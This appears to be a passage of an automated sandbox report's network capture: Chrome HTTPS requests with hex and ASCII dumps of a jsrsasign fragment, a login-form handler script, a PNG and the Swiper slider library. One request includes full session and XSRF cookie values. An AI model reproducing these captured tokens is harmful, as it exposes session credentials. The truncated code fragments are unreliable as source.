69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 26 26 28
                                                      Data Ascii: this.hV=KJUR.asn1.ASN1Util.bigIntToMinTwosComplementsHex(t)},this.setByInteger=function(t){var i=new e(String(t),10);this.setByBigInteger(i)},this.setValueHex=function(t){this.hV=t},this.getFreshValueHex=function(){return this.hV},"undefined"!=typeof t&&(
                                                      2025-01-12 23:47:49 UTC4096INData Raw: 52 49 41 35 53 74 72 69 6e 67 2c 4b 4a 55 52 2e 61 73 6e 31 2e 44 45 52 41 62 73 74 72 61 63 74 53 74 72 69 6e 67 29 2c 4b 4a 55 52 2e 61 73 6e 31 2e 44 45 52 55 54 43 54 69 6d 65 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 4b 4a 55 52 2e 61 73 6e 31 2e 44 45 52 55 54 43 54 69 6d 65 2e 73 75 70 65 72 63 6c 61 73 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 2e 63 61 6c 6c 28 74 68 69 73 2c 74 29 2c 74 68 69 73 2e 68 54 3d 22 31 37 22 2c 74 68 69 73 2e 73 65 74 42 79 44 61 74 65 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 68 69 73 2e 68 54 4c 56 3d 6e 75 6c 6c 2c 74 68 69 73 2e 69 73 4d 6f 64 69 66 69 65 64 3d 21 30 2c 74 68 69 73 2e 64 61 74 65 3d 74 2c 74 68 69 73 2e 73 3d 74 68 69 73 2e 66 6f 72 6d 61 74 44 61 74 65 28 74 68 69 73 2e 64 61 74 65 2c 22 75 74 63 22 29
                                                      Data Ascii: RIA5String,KJUR.asn1.DERAbstractString),KJUR.asn1.DERUTCTime=function(t){KJUR.asn1.DERUTCTime.superclass.constructor.call(this,t),this.hT="17",this.setByDate=function(t){this.hTLV=null,this.isModified=!0,this.date=t,this.s=this.formatDate(this.date,"utc")


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      41192.168.2.44978720.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:48 UTC640OUTGET /plus/js/unite/encforms.js?ver=1723544858 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:49 UTC318INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:49 GMT
                                                      Content-Type: application/javascript
                                                      Content-Length: 11516
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Last-Modified: Tue, 13 Aug 2024 10:27:38 GMT
                                                      ETag: "66bb351a-2cfc"
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:49 UTC3778INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 24 29 7b 0a 20 20 20 20 6c 65 74 20 6c 6f 67 6f 75 74 6c 6f 63 6b 20 3d 20 66 61 6c 73 65 3b 0a 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 6f 6e 28 27 73 75 62 6d 69 74 27 2c 27 66 6f 72 6d 5b 61 63 74 69 6f 6e 3d 22 2f 6c 6f 67 69 6e 5f 61 63 74 69 6f 6e 22 5d 3a 6e 6f 74 28 2e 68 69 64 65 29 27 2c 66 75 6e 63 74 69 6f 6e 28 65 76 74 29 7b 0a 20 20 20 20 09 65 76 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 0a 20 20 20 20 09 69 66 28 24 28 74 68 69 73 29 2e 64 61 74 61 28 27 69 73 53 75 62 6d 69 74 27 29 29 7b 0a 20 20 20 20 09 09 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 0a 20 20 20 20 09 7d 0a 20 20 20 20 09 76 61 72 20 64 20 3d 20 6e 65 77 20 44 61 74 65 28 29 2c 20 76 61 6c 69 64 63 6f 64 65 20 3d 20 4d 61
                                                      Data Ascii: (function($){ let logoutlock = false; $(document).on('submit','form[action="/login_action"]:not(.hide)',function(evt){ evt.preventDefault(); if($(this).data('isSubmit')){ return false; } var d = new Date(), validcode = Ma
                                                      2025-01-12 23:47:49 UTC4096INData Raw: 5f 28 27 6c 6f 67 69 6e 54 72 61 6e 73 2e 76 65 72 69 66 79 52 65 61 6c 4e 61 6d 65 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 6f 62 6a 2e 73 74 61 74 75 73 20 3d 3d 20 27 61 75 74 68 27 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 69 65 6c 64 6e 61 6d 65 20 3d 20 27 61 75 74 68 63 6f 64 65 27 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 69 74 6c 65 20 3d 20 5f 5f 28 27 6c 6f 67 69 6e 54 72 61 6e 73 2e 76 65 72 69 66 79 54 77 69 63 65 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 27 73 77 61 6c 27 20 69 6e 20 77 69 6e 64 6f 77 29 7b 0a 20 20 20 20 20
                                                      Data Ascii: _('loginTrans.verifyRealName'); } if(obj.status == 'auth'){ fieldname = 'authcode'; title = __('loginTrans.verifyTwice'); } if('swal' in window){
                                                      2025-01-12 23:47:49 UTC3642INData Raw: 2e 64 65 73 74 72 6f 79 28 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 7b 22 65 6e 61 62 6c 65 44 61 72 6b 4d 6f 64 65 22 3a 20 74 72 75 65 2c 62 69 7a 53 74 61 74 65 3a 20 70 6f 73 74 5b 27 66 72 5f 75 73 65 72 6e 61 6d 65 27 5d 7d 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 61 70 2e 73 68 6f 77 28 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2c 63 61 70 74 63 68 61 4d 6f 75 6e 74 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0a 20 20 20 20 20 20 20 20
                                                      Data Ascii: .destroy(); },{"enableDarkMode": true,bizState: post['fr_username']}); cap.show(); } ,captchaMount = function(){ var t = document.createElement("script");


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      42192.168.2.449789154.86.18.44434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:48 UTC1205OUTGET /common/storage/cms/cms_1045.png?v=1611754636 HTTP/1.1
                                                      Host: b45032.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: XSRF-TOKEN=eyJpdiI6IlQ5TG5DTmYzQ250YWc5Zm0xMTF6NWc9PSIsInZhbHVlIjoiMUU0dWNhMTJHV3BiXC81MTF6dGZ1TTh5UWJCMHlXbXBXUFlQUFM2dzMxVmUxc2lTODBxcmh5ajd0d0k5ZE0zbmZ5MkVLTmVEaWRXVVFvUEo4OWhRaGt3PT0iLCJtYWMiOiIwYzg3ZGU4MTY2MDI0Nzk3MDM3YzJjMzIzMTk4MGYyYzM4Yjg5N2JhOGNkYmIwOTllODIxNDdhNDRhMzk1Njg3In0%3D; vanguard_session=eyJpdiI6InFvbEpjb3ltYnI5UHF4Y0IwMExEMGc9PSIsInZhbHVlIjoiZ3g1SGg1eEVkb3dUaGFBY1lKUnhWQUVLMEFDd0cwVXlPWlJnaVk5c2hHWTBFY0h2cmhZb2t6dWFwb3hxRDZuV1YrME5oSzVtbnQ2bHdHVFpvbGlZXC93PT0iLCJtYWMiOiIyODY3YzY0OTQ3ZDNjNDJiYTVhNjIxZmZhMzhiYzdjYTc1ZDU0ZGRkY2QzNWJjM2I4YTdkNjE3MTI4OTRjMTQ1In0%3D
                                                      2025-01-12 23:47:49 UTC431INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:49 GMT
                                                      Content-Type: image/png
                                                      Content-Length: 25135
                                                      Connection: close
                                                      Alt-Svc: h3="67e285f0.t74nx2b2.com:443";ma=604800;persist=1,h2="bt5.tuf3a353.com:443";ma=604800;persist=1
                                                      Last-Modified: Wed, 27 Jan 2021 12:40:06 GMT
                                                      ETag: "60115f26-622f"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      X-Cache-Status: HIT
                                                      Server: nginx
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:49 UTC15953INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 18 00 00 01 18 08 03 00 00 00 b0 50 19 be 00 00 03 00 50 4c 54 45 00 00 00 1c 10 0d 16 0a 09 13 0a 08 11 08 07 12 09 07 0a 06 05 11 09 07 08 05 04 05 03 02 02 01 00 20 12 0d 04 02 01 fc fb fa 22 15 0e 23 16 0f 23 16 11 1d 12 0e 06 03 01 25 17 11 24 17 11 20 15 10 f3 f3 f3 1e 14 11 6c 35 03 69 34 01 38 1d 13 04 02 02 64 32 02 62 29 01 32 2d 29 3a 19 04 af 77 0a a5 68 05 3f 20 07 b4 80 22 25 16 0f 49 24 03 51 26 02 e9 3f 2f 88 4f 07 57 2b 02 f9 ae 00 4d 22 0a 3b 35 38 fe ed 2a 4e 1d 0b fe fb 7c 37 1e 10 64 32 05 50 22 10 ca a2 0f ef e0 23 5a 2d 03 97 5f 04 da a6 42 b7 89 11 da b6 0a fe f5 42 e4 ce 1a fd fc fc fe fb b9 fe fb 91 ba a4 87 ff fc cf 95 60 0b a1 57 33 7c 69 43 d8 9d 22 f6 e5 82 c3 98 20 40
                                                      Data Ascii: PNGIHDRPPLTE "##%$ l5i48d2b)2-):wh? "%I$Q&?/OW+M";58*N|7d2P"#Z-_BB`W3|iC" @
                                                      2025-01-12 23:47:49 UTC9182INData Raw: 0c d5 35 24 ab a2 e5 93 51 bb bb 5b db 1d d4 19 97 4c 09 5c da 9e 81 f3 0c a7 76 75 68 75 5a 8d 99 b0 3b f8 fe 80 d3 bc f8 c0 a9 cf be fe fa d4 a6 b3 09 39 86 4f 87 e0 80 cb 6b 87 8f bd ce eb e5 80 2d 07 7e a3 7b df 46 20 41 22 5e 98 22 26 55 14 30 56 bc d4 a8 5b 99 3a db c0 7f fb 2d 62 09 e3 2b 6a a7 00 22 9b 4e 6b c3 5e bf b7 eb 1b 06 a2 40 f2 d4 7c 5c 12 15 2d 63 17 e0 aa 66 b7 e5 9e bc ab 52 fb b8 e9 6c 2a 07 6e 3b e9 16 5b 9d 8e bb 49 e2 7d ef fc fc e3 cf 3f 7e 94 2a 47 bc 47 83 7a 24 21 92 ce ff 30 4d b3 38 89 ee a6 10 45 ab 81 63 ba 01 55 32 dd f1 e2 e3 e5 d5 0a 46 35 50 9c 16 fa 85 ad 5e 6d d0 ad 17 68 77 9b d1 b4 52 b5 d0 ae aa 79 55 61 d3 cf 92 d5 1d 74 07 83 5c 35 2b 70 f5 9c 69 7a 64 16 af 9c 5b 8a b5 1c f5 24 bf b9 4f 67 6a 90 e2 f5 e5 80 4d
                                                      Data Ascii: 5$Q[L\vuhuZ;9Ok-~{F A"^"&U0V[:-b+j"Nk^@|\-cfRl*n;[I}?~*GGz$!0M8EcU2F5P^mhwRyUat\5+pizd[$OgjM


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      43192.168.2.44979120.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:48 UTC385OUTGET /plus/plugin/js/swiper.min.js?ver=1606790105 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:49 UTC320INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:49 GMT
                                                      Content-Type: application/javascript
                                                      Content-Length: 114405
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Last-Modified: Tue, 01 Dec 2020 02:35:05 GMT
                                                      ETag: "5fc5abd9-1bee5"
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:49 UTC3776INData Raw: 2f 2a 2a 0a 20 2a 20 53 77 69 70 65 72 20 34 2e 31 2e 30 0a 20 2a 20 4d 6f 73 74 20 6d 6f 64 65 72 6e 20 6d 6f 62 69 6c 65 20 74 6f 75 63 68 20 73 6c 69 64 65 72 20 61 6e 64 20 66 72 61 6d 65 77 6f 72 6b 20 77 69 74 68 20 68 61 72 64 77 61 72 65 20 61 63 63 65 6c 65 72 61 74 65 64 20 74 72 61 6e 73 69 74 69 6f 6e 73 0a 20 2a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 69 64 61 6e 67 65 72 6f 2e 75 73 2f 73 77 69 70 65 72 2f 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 34 2d 32 30 31 38 20 56 6c 61 64 69 6d 69 72 20 4b 68 61 72 6c 61 6d 70 69 64 69 0a 20 2a 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 0a 20 2a 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 6f 6e 3a 20 4a 61 6e 75 61 72 79 20 31 33 2c
                                                      Data Ascii: /** * Swiper 4.1.0 * Most modern mobile touch slider and framework with hardware accelerated transitions * http://www.idangero.us/swiper/ * * Copyright 2014-2018 Vladimir Kharlampidi * * Released under the MIT License * * Released on: January 13,
                                                      2025-01-12 23:47:49 UTC4096INData Raw: 74 68 3b 68 2b 3d 31 29 75 2e 64 6f 6d 37 4c 69 73 74 65 6e 65 72 73 7c 7c 28 75 2e 64 6f 6d 37 4c 69 73 74 65 6e 65 72 73 3d 5b 5d 29 2c 75 2e 64 6f 6d 37 4c 69 73 74 65 6e 65 72 73 2e 70 75 73 68 28 7b 74 79 70 65 3a 61 2c 6c 69 73 74 65 6e 65 72 3a 6e 2c 70 72 6f 78 79 4c 69 73 74 65 6e 65 72 3a 64 7d 29 2c 75 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 70 5b 68 5d 2c 64 2c 6f 29 7d 72 65 74 75 72 6e 20 74 68 69 73 7d 2c 6f 66 66 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 74 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 74 2d 2d 3b 29 65 5b 74 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3b 76 61 72 20 69 2c 73 3d 65 5b 30 5d 2c 61 3d 65 5b 31 5d 2c 72 3d 65 5b 32 5d 2c 6e 3d 65 5b 33 5d 3b 22 66 75 6e 63
                                                      Data Ascii: th;h+=1)u.dom7Listeners||(u.dom7Listeners=[]),u.dom7Listeners.push({type:a,listener:n,proxyListener:d}),u.addEventListener(p[h],d,o)}return this},off:function(){for(var e=[],t=arguments.length;t--;)e[t]=arguments[t];var i,s=e[0],a=e[1],r=e[2],n=e[3];"func
                                                      2025-01-12 23:47:49 UTC4096INData Raw: 65 6e 64 43 68 69 6c 64 28 6e 2e 66 69 72 73 74 43 68 69 6c 64 29 7d 65 6c 73 65 20 69 66 28 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 65 29 66 6f 72 28 76 61 72 20 6f 3d 30 3b 6f 3c 74 2e 6c 65 6e 67 74 68 3b 6f 2b 3d 31 29 74 68 69 73 5b 72 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 5b 6f 5d 29 3b 65 6c 73 65 20 74 68 69 73 5b 72 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 72 65 74 75 72 6e 20 74 68 69 73 7d 2c 70 72 65 70 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 69 2c 73 3b 66 6f 72 28 69 3d 30 3b 69 3c 74 68 69 73 2e 6c 65 6e 67 74 68 3b 69 2b 3d 31 29 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 29 7b 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b
                                                      Data Ascii: endChild(n.firstChild)}else if(t instanceof e)for(var o=0;o<t.length;o+=1)this[r].appendChild(t[o]);else this[r].appendChild(t)}return this},prepend:function(t){var i,s;for(i=0;i<this.length;i+=1)if("string"==typeof t){var a=document.createElement("div");
                                                      2025-01-12 23:47:49 UTC4096INData Raw: 6f 6e 73 74 72 75 63 74 6f 72 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 4f 62 6a 65 63 74 7d 2c 65 78 74 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 74 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 74 2d 2d 3b 29 65 5b 74 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3b 66 6f 72 28 76 61 72 20 69 3d 4f 62 6a 65 63 74 28 65 5b 30 5d 29 2c 73 3d 31 3b 73 3c 65 2e 6c 65 6e 67 74 68 3b 73 2b 3d 31 29 7b 76 61 72 20 61 3d 65 5b 73 5d 3b 69 66 28 76 6f 69 64 20 30 21 3d 3d 61 26 26 6e 75 6c 6c 21 3d 3d 61 29 66 6f 72 28 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 4f 62 6a 65 63 74 28 61 29 29 2c 6e 3d 30 2c 6f 3d 72 2e 6c 65 6e 67 74 68 3b 6e 3c 6f 3b 6e 2b 3d 31 29 7b 76 61 72 20 64 3d 72 5b 6e
                                                      Data Ascii: onstructor&&e.constructor===Object},extend:function(){for(var e=[],t=arguments.length;t--;)e[t]=arguments[t];for(var i=Object(e[0]),s=1;s<e.length;s+=1){var a=e[s];if(void 0!==a&&null!==a)for(var r=Object.keys(Object(a)),n=0,o=r.length;n<o;n+=1){var d=r[n
                                                      2025-01-12 23:47:49 UTC4096INData Raw: 28 73 2c 74 29 2c 73 7d 2c 70 2e 75 73 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 5b 5d 2c 69 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2d 31 3b 69 2d 2d 20 3e 30 3b 29 74 5b 69 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 69 2b 31 5d 3b 76 61 72 20 73 3d 74 68 69 73 3b 72 65 74 75 72 6e 20 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 65 29 3f 28 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 73 2e 69 6e 73 74 61 6c 6c 4d 6f 64 75 6c 65 28 65 29 7d 29 2c 73 29 3a 73 2e 69 6e 73 74 61 6c 6c 4d 6f 64 75 6c 65 2e 61 70 70 6c 79 28 73 2c 5b 65 5d 2e 63 6f 6e 63 61 74 28 74 29 29 7d 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 28 70 2c 63 29 3b 76 61 72 20 75 3d 7b 75
                                                      Data Ascii: (s,t),s},p.use=function(e){for(var t=[],i=arguments.length-1;i-- >0;)t[i]=arguments[i+1];var s=this;return Array.isArray(e)?(e.forEach(function(e){return s.installModule(e)}),s):s.installModule.apply(s,[e].concat(t))},Object.defineProperties(p,c);var u={u
                                                      2025-01-12 23:47:49 UTC4096INData Raw: 69 67 68 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 74 3d 5b 5d 2c 69 3d 30 3b 69 66 28 22 61 75 74 6f 22 21 3d 3d 74 68 69 73 2e 70 61 72 61 6d 73 2e 73 6c 69 64 65 73 50 65 72 56 69 65 77 26 26 74 68 69 73 2e 70 61 72 61 6d 73 2e 73 6c 69 64 65 73 50 65 72 56 69 65 77 3e 31 29 66 6f 72 28 65 3d 30 3b 65 3c 4d 61 74 68 2e 63 65 69 6c 28 74 68 69 73 2e 70 61 72 61 6d 73 2e 73 6c 69 64 65 73 50 65 72 56 69 65 77 29 3b 65 2b 3d 31 29 7b 76 61 72 20 73 3d 74 68 69 73 2e 61 63 74 69 76 65 49 6e 64 65 78 2b 65 3b 69 66 28 73 3e 74 68 69 73 2e 73 6c 69 64 65 73 2e 6c 65 6e 67 74 68 29 62 72 65 61 6b 3b 74 2e 70 75 73 68 28 74 68 69 73 2e 73 6c 69 64 65 73 2e 65 71 28 73 29 5b 30 5d 29 7d 65 6c 73 65 20 74 2e 70 75 73 68 28 74 68 69 73 2e 73 6c 69
                                                      Data Ascii: ight:function(){var e,t=[],i=0;if("auto"!==this.params.slidesPerView&&this.params.slidesPerView>1)for(e=0;e<Math.ceil(this.params.slidesPerView);e+=1){var s=this.activeIndex+e;if(s>this.slides.length)break;t.push(this.slides.eq(s)[0])}else t.push(this.sli
                                                      2025-01-12 23:47:49 UTC4096INData Raw: 74 28 22 73 6c 69 64 65 43 68 61 6e 67 65 22 29 7d 65 6c 73 65 20 74 21 3d 3d 64 26 26 28 74 68 69 73 2e 73 6e 61 70 49 6e 64 65 78 3d 74 2c 74 68 69 73 2e 65 6d 69 74 28 22 73 6e 61 70 49 6e 64 65 78 43 68 61 6e 67 65 22 29 29 7d 2c 75 70 64 61 74 65 43 6c 69 63 6b 65 64 53 6c 69 64 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 69 3d 74 68 69 73 2e 70 61 72 61 6d 73 2c 73 3d 74 28 65 2e 74 61 72 67 65 74 29 2e 63 6c 6f 73 65 73 74 28 22 2e 22 2b 69 2e 73 6c 69 64 65 43 6c 61 73 73 29 5b 30 5d 2c 61 3d 21 31 3b 69 66 28 73 29 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 74 68 69 73 2e 73 6c 69 64 65 73 2e 6c 65 6e 67 74 68 3b 72 2b 3d 31 29 74 68 69 73 2e 73 6c 69 64 65 73 5b 72 5d 3d 3d 3d 73 26 26 28 61 3d 21 30 29 3b 69 66 28 21 73 7c 7c 21 61 29
                                                      Data Ascii: t("slideChange")}else t!==d&&(this.snapIndex=t,this.emit("snapIndexChange"))},updateClickedSlide:function(e){var i=this.params,s=t(e.target).closest("."+i.slideClass)[0],a=!1;if(s)for(var r=0;r<this.slides.length;r+=1)this.slides[r]===s&&(a=!0);if(!s||!a)
                                                      2025-01-12 23:47:49 UTC4096INData Raw: 69 64 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 69 3d 74 68 69 73 2c 73 3d 69 2e 70 61 72 61 6d 73 2c 61 3d 69 2e 24 77 72 61 70 70 65 72 45 6c 2c 72 3d 22 61 75 74 6f 22 3d 3d 3d 73 2e 73 6c 69 64 65 73 50 65 72 56 69 65 77 3f 69 2e 73 6c 69 64 65 73 50 65 72 56 69 65 77 44 79 6e 61 6d 69 63 28 29 3a 73 2e 73 6c 69 64 65 73 50 65 72 56 69 65 77 2c 6e 3d 69 2e 63 6c 69 63 6b 65 64 49 6e 64 65 78 3b 69 66 28 73 2e 6c 6f 6f 70 29 7b 69 66 28 69 2e 61 6e 69 6d 61 74 69 6e 67 29 72 65 74 75 72 6e 3b 65 3d 70 61 72 73 65 49 6e 74 28 74 28 69 2e 63 6c 69 63 6b 65 64 53 6c 69 64 65 29 2e 61 74 74 72 28 22 64 61 74 61 2d 73 77 69 70 65 72 2d 73 6c 69 64 65 2d 69 6e 64 65 78 22 29 2c 31 30 29 2c 73 2e 63 65 6e 74 65 72 65 64 53 6c 69 64 65 73 3f 6e
                                                      Data Ascii: ide:function(){var e,i=this,s=i.params,a=i.$wrapperEl,r="auto"===s.slidesPerView?i.slidesPerViewDynamic():s.slidesPerView,n=i.clickedIndex;if(s.loop){if(i.animating)return;e=parseInt(t(i.clickedSlide).attr("data-swiper-slide-index"),10),s.centeredSlides?n
                                                      2025-01-12 23:47:49 UTC4096INData Raw: 2c 6e 3d 21 61 26 26 65 2e 6d 61 74 63 68 28 2f 28 69 50 68 6f 6e 65 5c 73 4f 53 7c 69 4f 53 29 5c 73 28 5b 5c 64 5f 5d 2b 29 2f 29 3b 69 66 28 69 26 26 28 74 2e 6f 73 3d 22 77 69 6e 64 6f 77 73 22 2c 74 2e 6f 73 56 65 72 73 69 6f 6e 3d 69 5b 32 5d 2c 74 2e 77 69 6e 64 6f 77 73 3d 21 30 29 2c 73 26 26 21 69 26 26 28 74 2e 6f 73 3d 22 61 6e 64 72 6f 69 64 22 2c 74 2e 6f 73 56 65 72 73 69 6f 6e 3d 73 5b 32 5d 2c 74 2e 61 6e 64 72 6f 69 64 3d 21 30 2c 74 2e 61 6e 64 72 6f 69 64 43 68 72 6f 6d 65 3d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2e 69 6e 64 65 78 4f 66 28 22 63 68 72 6f 6d 65 22 29 3e 3d 30 29 2c 28 61 7c 7c 6e 7c 7c 72 29 26 26 28 74 2e 6f 73 3d 22 69 6f 73 22 2c 74 2e 69 6f 73 3d 21 30 29 2c 6e 26 26 21 72 26 26 28 74 2e 6f 73 56 65 72 73 69
                                                      Data Ascii: ,n=!a&&e.match(/(iPhone\sOS|iOS)\s([\d_]+)/);if(i&&(t.os="windows",t.osVersion=i[2],t.windows=!0),s&&!i&&(t.os="android",t.osVersion=s[2],t.android=!0,t.androidChrome=e.toLowerCase().indexOf("chrome")>=0),(a||n||r)&&(t.os="ios",t.ios=!0),n&&!r&&(t.osVersi
                                                      2025-01-12 23:47:49 UTC4096INData Raw: 30 3b 76 61 72 20 66 3d 74 68 69 73 2e 69 73 48 6f 72 69 7a 6f 6e 74 61 6c 28 29 3f 63 3a 75 3b 61 2e 64 69 66 66 3d 66 2c 66 2a 3d 73 2e 74 6f 75 63 68 52 61 74 69 6f 2c 72 26 26 28 66 3d 2d 66 29 2c 74 68 69 73 2e 73 77 69 70 65 44 69 72 65 63 74 69 6f 6e 3d 66 3e 30 3f 22 70 72 65 76 22 3a 22 6e 65 78 74 22 2c 69 2e 63 75 72 72 65 6e 74 54 72 61 6e 73 6c 61 74 65 3d 66 2b 69 2e 73 74 61 72 74 54 72 61 6e 73 6c 61 74 65 3b 76 61 72 20 76 3d 21 30 2c 6d 3d 73 2e 72 65 73 69 73 74 61 6e 63 65 52 61 74 69 6f 3b 69 66 28 73 2e 74 6f 75 63 68 52 65 6c 65 61 73 65 4f 6e 45 64 67 65 73 26 26 28 6d 3d 30 29 2c 66 3e 30 26 26 69 2e 63 75 72 72 65 6e 74 54 72 61 6e 73 6c 61 74 65 3e 74 68 69 73 2e 6d 69 6e 54 72 61 6e 73 6c 61 74 65 28 29 3f 28 76 3d 21 31 2c 73
                                                      Data Ascii: 0;var f=this.isHorizontal()?c:u;a.diff=f,f*=s.touchRatio,r&&(f=-f),this.swipeDirection=f>0?"prev":"next",i.currentTranslate=f+i.startTranslate;var v=!0,m=s.resistanceRatio;if(s.touchReleaseOnEdges&&(m=0),f>0&&i.currentTranslate>this.minTranslate()?(v=!1,s


